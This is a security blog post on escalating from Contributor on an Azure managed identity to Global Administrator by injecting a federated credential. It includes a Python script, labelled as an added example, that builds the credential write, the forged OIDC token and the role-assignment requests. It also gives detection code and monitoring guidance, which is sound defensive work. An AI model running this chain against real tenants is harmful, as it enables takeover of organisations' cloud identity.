Cloud environments often rely on automation identities such as Managed Identities and federated credentials to remove secrets from workloads. While this improves operational security, misconfigurations can introduce powerful privilege escalation paths.
This post shows how an attacker can escalate from limited Azure resource access (Contributor on a single resource, no directory role) to Global Administrator by abusing:
👉 A User-Assigned Managed Identity (UAMI) with high-privilege API permissions
👉 Federated Identity Credential (FIC) injection
👉 Microsoft Entra token trust via OIDC federation
Attack Scenario
Assume the following misconfiguration exists in a tenant:
A User-Assigned Managed Identity exists.
The identity already holds high-privilege Microsoft Graph application permissions, or an attacker-controlled principal is able to grant them. Examples:
RoleManagement.ReadWrite.Directory
Application.ReadWrite.All
Directory.ReadWrite.All
An attacker can add or modify Federated Identity Credentials on that identity. This is easy once the attacker holds the Contributor role on the UAMI resource (or any Azure RBAC role that includes the action Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write); no Entra directory role is required.
Low-privileged access (e.g. Contributor on a resource group or on the UAMI itself)
▼
Enumerate Azure resources
▼
Identify a User-Assigned Managed Identity the attacker can write to (Contributor on the UAMI)
▼
Add a malicious Federated Identity Credential (attacker-controlled issuer and subject)
▼
Forge an OIDC token from that issuer whose claims match the credential
▼
Exchange it for an Entra access token as the Managed Identity
▼
Use the identity's Graph permissions
▼
Assign Global Administrator
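The chain above, written out as the three requests involved, as an added example that is not part of the original post. It assumes placeholder identifiers (subscription, tenant, UAMI client ID, attacker issuer URL), an ARM API version of 2023-01-31 for Microsoft.ManagedIdentity, and that the attacker already serves a JWKS for the issuer; RSA signing is injected as a callable so the module runs offline.

```python
import base64
import json
import time
import urllib.parse
import urllib.request

# Values documented by Microsoft
TOKEN_EXCHANGE_AUDIENCE = "api://AzureADTokenExchange"  # default audience of a federated credential
GLOBAL_ADMIN_ROLE_ID = "62e90394-69f5-4237-9190-012177145e10"  # Global Administrator role template ID
ARM_API_VERSION = "2023-01-31"  # Microsoft.ManagedIdentity API version (assumption: current GA version)


def b64url(data: bytes) -> str:
    """JWT-style base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def forge_client_assertion(issuer, subject, kid, signer, now=None, ttl=300):
    """Build the RS256 JWT the attacker's IdP issues (step 'Forge OIDC token').

    The claims must match the injected FIC exactly: iss == FIC issuer, sub == FIC subject,
    aud == one of the FIC audiences. `signer(data) -> bytes` returns the RSA-PKCS1v1.5/SHA-256
    signature over the signing input; the matching public key must be published at the
    issuer's JWKS (discovered via <issuer>/.well-known/openid-configuration), which the
    attacker controls in this scenario and which is not shown here.
    """
    now = int(time.time()) if now is None else now
    header = {"alg": "RS256", "typ": "JWT", "kid": kid}
    claims = {"iss": issuer, "sub": subject, "aud": TOKEN_EXCHANGE_AUDIENCE,
              "iat": now, "nbf": now, "exp": now + ttl}

    def compact(obj):
        return b64url(json.dumps(obj, separators=(",", ":")).encode())

    signing_input = f"{compact(header)}.{compact(claims)}"
    return f"{signing_input}.{b64url(signer(signing_input.encode()))}"


def decode_jwt(token):
    """Return (header, claims) without verifying; used to inspect what was forged."""
    h, c, _sig = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(c))


def fic_write_request(subscription, resource_group, identity_name, fic_name, issuer, subject, arm_token):
    """Step 'Add malicious Federated Identity Credential': an ARM PUT on the UAMI.
    Needs the RBAC action Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write,
    which Contributor on the identity (or its resource group) grants."""
    url = (f"https://management.azure.com/subscriptions/{subscription}"
           f"/resourceGroups/{resource_group}/providers/Microsoft.ManagedIdentity"
           f"/userAssignedIdentities/{identity_name}/federatedIdentityCredentials/{fic_name}"
           f"?api-version={ARM_API_VERSION}")
    body = {"properties": {"issuer": issuer, "subject": subject, "audiences": [TOKEN_EXCHANGE_AUDIENCE]}}
    return {"method": "PUT", "url": url,
            "headers": {"Authorization": f"Bearer {arm_token}", "Content-Type": "application/json"},
            "body": body}


def token_exchange_request(tenant_id, uami_client_id, assertion):
    """Step 'Authenticate as the Managed Identity': client_credentials with the forged JWT as
    client_assertion. Entra fetches the issuer's JWKS, verifies the signature and matches
    iss/sub/aud against the FIC before issuing a token carrying the UAMI's Graph app roles."""
    form = {
        "grant_type": "client_credentials",
        "client_id": uami_client_id,                      # the UAMI's client (app) ID
        "scope": "https://graph.microsoft.com/.default",   # all Graph app roles the UAMI holds
        "client_assertion_type": "urn:ietf:params:oauth:client-assertion-type:jwt-bearer",
        "client_assertion": assertion,
    }
    return {"method": "POST",
            "url": f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token",
            "headers": {"Content-Type": "application/x-www-form-urlencoded"},
            "body": urllib.parse.urlencode(form)}


def global_admin_request(target_principal_id, graph_token):
    """Step 'Assign Global Administrator': unified role assignment at tenant scope ("/").
    Succeeds only if the UAMI holds RoleManagement.ReadWrite.Directory."""
    return {"method": "POST",
            "url": "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments",
            "headers": {"Authorization": f"Bearer {graph_token}", "Content-Type": "application/json"},
            "body": {"principalId": target_principal_id,
                     "roleDefinitionId": GLOBAL_ADMIN_ROLE_ID,
                     "directoryScopeId": "/"}}


def send(req):
    """Execute one of the request dicts above (only against a lab tenant you own)."""
    data = req["body"] if isinstance(req["body"], str) else json.dumps(req["body"])
    r = urllib.request.Request(req["url"], data=data.encode(), method=req["method"], headers=req["headers"])
    with urllib.request.urlopen(r) as resp:
        return json.load(resp)


if __name__ == "__main__":
    # Placeholders (assumptions): attacker-controlled issuer, lab identifiers, dummy signer.
    issuer, subject = "https://idp.attacker.example", "system:serviceaccount:ci:deployer"
    fic = fic_write_request("<subscription-id>", "rg-prod", "uami-prod", "backdoor", issuer, subject, "<arm-token>")
    jwt = forge_client_assertion(issuer, subject, "key-1", signer=lambda data: b"<rsa-signature>")
    tok = token_exchange_request("<tenant-id>", "<uami-client-id>", jwt)
    ga = global_admin_request("<attacker-user-object-id>", "<graph-token>")
    for step in (fic, tok, ga):  # replace with send(step) in a lab, feeding each token forward
        print(step["method"], step["url"])
```

Two details matter in practice: the FIC's subject is free text, so the attacker picks any value and mints a token with the same `sub`; and nothing in the token exchange ties the issuer to Azure, so the only control point is who may write the credential.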
Key issues that enable the escalation:
- Over-privileged Managed Identities: managed identities often receive excessive Graph application permissions that are never reviewed, so whoever can authenticate as the identity inherits them.
- Federation trust abuse: a federated credential lets any external IdP whose issuer and subject match the credential authenticate as the workload, so whoever can write the credential controls the trust, and Azure RBAC (not Entra roles) decides who can write it.
Monitoring and Prevention
Because Federated Identity Credentials (FIC) allow external identity providers to authenticate workloads, they introduce a new identity trust boundary inside Microsoft Entra ID. When they are combined with high-privilege User-Assigned Managed Identities, a single Azure RBAC misconfiguration can lead to tenant-level privilege escalation. Organizations must implement continuous monitoring, strict permission governance, and identity hardening to prevent abuse: audit who holds write access on identities that carry Graph application permissions, review those permissions regularly, and restrict FIC issuers to known providers.
Detection Strategies
Monitor:
Federated credential creation
Log source: Azure Activity Log (AzureActivity). A FIC on a User-Assigned Managed Identity is an ARM resource, so adding or changing one is recorded as the operation Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write. It does not appear in the Entra AuditLogs, which only record federated credentials added to app registrations.
Privileged API permission assignments (all highly privileged application permissions)
Log source: Entra AuditLogs, operation "Add app role assignment to service principal".
Look for:
Directory.ReadWrite.All
RoleManagement.ReadWrite.Directory
Application.ReadWrite.All
Identity token issuance anomalies
Look for unusual OIDC issuers: baseline the issuer and subject configured on every FIC in the tenant and alert on any issuer that is not one of your known pipeline or cluster providers.
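The two detections above run over sample log records, as an added example that is not part of the original post. The record shapes are simplified, constructed versions of an AzureActivity row and an Entra AuditLogs row (field names follow those tables; the status values and the presence of the request body in Properties are assumptions to confirm against your own pipeline), and the issuer allowlist is a placeholder to adjust to your estate.

```python
import json

# Azure Activity Log operation for adding/changing a FIC on a User-Assigned Managed Identity
FIC_WRITE_OP = "Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write"
# Entra audit activity written when an application permission (app role) is granted to a service principal
APP_ROLE_GRANT_OP = "Add app role assignment to service principal"
# Assumption: status values as they appear in AzureActivity for completed writes
SUCCESS_STATUSES = {"Success", "Succeeded"}

PRIVILEGED_GRAPH_ROLES = {
    "RoleManagement.ReadWrite.Directory",
    "Application.ReadWrite.All",
    "Directory.ReadWrite.All",
    "AppRoleAssignment.ReadWrite.All",
}
# Assumption: issuers your pipelines legitimately federate from
KNOWN_ISSUERS = {"https://token.actions.githubusercontent.com"}


def flag_fic_writes(activity_records, known_issuers=KNOWN_ISSUERS):
    """Return every successful FIC write, marking those whose issuer is not allowlisted.
    Every write is worth a ticket; an unknown issuer is the high-severity case."""
    hits = []
    for rec in activity_records:
        if rec.get("OperationNameValue") != FIC_WRITE_OP:
            continue
        if rec.get("ActivityStatusValue") not in SUCCESS_STATUSES:
            continue  # skip the "Start" event that precedes each completed write
        body = rec.get("Properties", {}).get("requestbody")
        props = json.loads(body).get("properties", {}) if body else {}
        issuer = props.get("issuer")
        hits.append({
            "caller": rec.get("Caller"),
            "resource": rec.get("ResourceId"),
            "issuer": issuer,
            "subject": props.get("subject"),
            # No body logged -> cannot vouch for the issuer; treat as unknown
            "unknown_issuer": issuer not in known_issuers,
        })
    return hits


def flag_privileged_grants(audit_records, privileged=PRIVILEGED_GRAPH_ROLES):
    """Return app-role grants of privileged Graph permissions from Entra audit records."""
    hits = []
    for rec in audit_records:
        if rec.get("OperationName") != APP_ROLE_GRANT_OP:
            continue
        for target in rec.get("TargetResources", []):
            # AuditLogs store newValue as a JSON-encoded string, hence the json.loads
            mods = {m["displayName"]: json.loads(m["newValue"]) for m in target.get("modifiedProperties", [])}
            role = mods.get("AppRole.Value")
            if role in privileged:
                hits.append({"actor": rec.get("InitiatedBy"), "grantee": target.get("displayName"), "role": role})
    return hits


# Constructed sample records (not real log data)
_UAMI = ("/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-prod/providers"
         "/Microsoft.ManagedIdentity/userAssignedIdentities/uami-prod/federatedIdentityCredentials/")
_attacker_body = json.dumps({"properties": {"issuer": "https://idp.attacker.example",
                                            "subject": "system:serviceaccount:ci:deployer",
                                            "audiences": ["api://AzureADTokenExchange"]}})
_github_body = json.dumps({"properties": {"issuer": "https://token.actions.githubusercontent.com",
                                          "subject": "repo:contoso/app:ref:refs/heads/main",
                                          "audiences": ["api://AzureADTokenExchange"]}})
SAMPLE_ACTIVITY = [
    {"OperationNameValue": FIC_WRITE_OP, "ActivityStatusValue": "Start", "Caller": "dev.contractor@contoso.example",
     "ResourceId": _UAMI + "backdoor", "Properties": {"requestbody": _attacker_body}},
    {"OperationNameValue": FIC_WRITE_OP, "ActivityStatusValue": "Success", "Caller": "dev.contractor@contoso.example",
     "ResourceId": _UAMI + "backdoor", "Properties": {"requestbody": _attacker_body}},
    {"OperationNameValue": FIC_WRITE_OP, "ActivityStatusValue": "Success", "Caller": "platform-team@contoso.example",
     "ResourceId": _UAMI + "github-main", "Properties": {"requestbody": _github_body}},
    {"OperationNameValue": "Microsoft.ManagedIdentity/userAssignedIdentities/read", "ActivityStatusValue": "Success",
     "Caller": "dev.contractor@contoso.example", "ResourceId": _UAMI[:-29], "Properties": {}},
]
SAMPLE_AUDIT = [
    {"OperationName": APP_ROLE_GRANT_OP, "InitiatedBy": "admin@contoso.example",
     "TargetResources": [{"displayName": "uami-prod", "modifiedProperties": [
         {"displayName": "AppRole.Value", "newValue": json.dumps("RoleManagement.ReadWrite.Directory")}]}]},
    {"OperationName": APP_ROLE_GRANT_OP, "InitiatedBy": "admin@contoso.example",
     "TargetResources": [{"displayName": "reporting-app", "modifiedProperties": [
         {"displayName": "AppRole.Value", "newValue": json.dumps("User.Read.All")}]}]},
]


def run(activity=SAMPLE_ACTIVITY, audit=SAMPLE_AUDIT):
    return flag_fic_writes(activity), flag_privileged_grants(audit)


if __name__ == "__main__":
    fic_hits, grant_hits = run()
    for h in fic_hits:
        print("FIC write", "UNKNOWN ISSUER" if h["unknown_issuer"] else "known issuer", h)
    for h in grant_hits:
        print("privileged grant", h)
```

Correlating the two outputs is the point: a privileged grant on an identity that later receives a FIC write from a different caller, or any FIC write with an unknown issuer, is the pattern described in the attack scenario. The same logic in KQL is a filter on OperationNameValue in AzureActivity plus a parse of Properties.requestbody, joined to the AuditLogs grants on the identity's display name or object ID.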
Conclusion
The attack highlights a growing class of identity-based privilege escalation paths in cloud environments, where control over trust relationships replaces traditional credential theft. As organizations increasingly rely on workload identities and secretless authentication, the security of identity configuration (who can write a credential, and what the identity behind it may do) becomes critical to preventing tenant-level compromise.
#security #azure #privesc #microsoft #entra #globaladmin #tenant #FIC #fedcred